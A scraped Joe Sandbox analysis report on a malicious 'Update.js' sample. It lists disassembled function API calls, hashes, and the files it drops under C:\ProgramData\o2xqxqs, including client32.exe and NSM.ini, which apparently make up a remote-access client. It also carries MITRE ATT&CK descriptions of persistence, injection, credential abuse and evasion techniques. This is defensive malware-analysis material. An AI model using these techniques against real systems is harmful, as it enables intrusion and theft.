Opcode Fuzzy Hash: fc0c8b9fffefdfec58d6b17608931234d5ca75a013e114f81d07d15824db0a83
Instruction Fuzzy Hash: B8D022B1E00235ABD7109656EC46FC5B2C8AB0E398F00407AF06262000E6B0E8808391

Function 1100D8B0 Relevance: 5.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(111EDE2C,00000000,?,?,1100C26B,00000000,00000000), ref: 1100D8BF
LeaveCriticalSection.KERNEL32(111EDE2C,?,?,1100C26B,00000000,00000000), ref: 1100D930

Part of subcall function 1100D820: EnterCriticalSection.KERNEL32(111EDE2C,1100CB7A,?,1100B5DC,?,00000000,?,1100CB7A,?), ref: 1100D829
Part of subcall function 1100D820: LeaveCriticalSection.KERNEL32(111EDE2C,1100B5DC,?,00000000,?,1100CB7A,?), ref: 1100D8A1

LeaveCriticalSection.KERNEL32(111EDE2C), ref: 1100D8FF
LeaveCriticalSection.KERNEL32(111EDE2C), ref: 1100D91B

Part of subcall function 1100D7D0: EnterCriticalSection.KERNEL32(111EDE2C,1100C4FB), ref: 1100D7D5
Part of subcall function 1100D7D0: LeaveCriticalSection.KERNEL32(111EDE2C), ref: 1100D80F

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$Enter
String ID:
API String ID: 2978645861-0
Opcode ID: 10c14cb9c45534fd9ad9362a8b8fd8fef3d09697d59f75ad4657c47dcd1b45a9
Instruction ID: 024bf54fe56583fc36b1911af5d7f6a9c338d46169c8d4f8be6289797e831c79
Opcode Fuzzy Hash: 10c14cb9c45534fd9ad9362a8b8fd8fef3d09697d59f75ad4657c47dcd1b45a9
Instruction Fuzzy Hash: 52018835E0113C6BEB00DBE9ED4D5ADB7A9EB04B9AB4001A6FD18D3A04E631AD0087E1

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Update.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\o2xqxqs.zip

C:\ProgramData\o2xqxqs\HTCTL32.DLL

C:\ProgramData\o2xqxqs\LogoDev.png

C:\ProgramData\o2xqxqs\NSM.LIC

C:\ProgramData\o2xqxqs\NSM.ini

C:\ProgramData\o2xqxqs\PCICHEK.DLL

C:\ProgramData\o2xqxqs\PCICL32.DLL

C:\ProgramData\o2xqxqs\TCCTL32.DLL

C:\ProgramData\o2xqxqs\VERSION

C:\ProgramData\o2xqxqs\client32.exe

C:\ProgramData\o2xqxqs\client32.ini

C:\ProgramData\o2xqxqs\delegatedWebFeatures.sccd

Windows Analysis Report
Update.js

Function 11144140 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134
libraryloaderCOMMONLIBRARYCODE

Function 11145C70 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 175
registryCOMMONLIBRARYCODE

Function 11146010 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84
libraryloaderCOMMON

Function 1102E0D0 Relevance: 82.9, APIs: 15, Strings: 32, Instructions: 630
COMMON

Function 1102E199 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319
libraryCOMMON

Function 11030EF3 Relevance: 44.1, APIs: 10, Strings: 15, Instructions: 350
registryCOMMON

Function 11028C10 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542
COMMONLIBRARYCODE

Function 110310D5 Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 315
COMMON

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre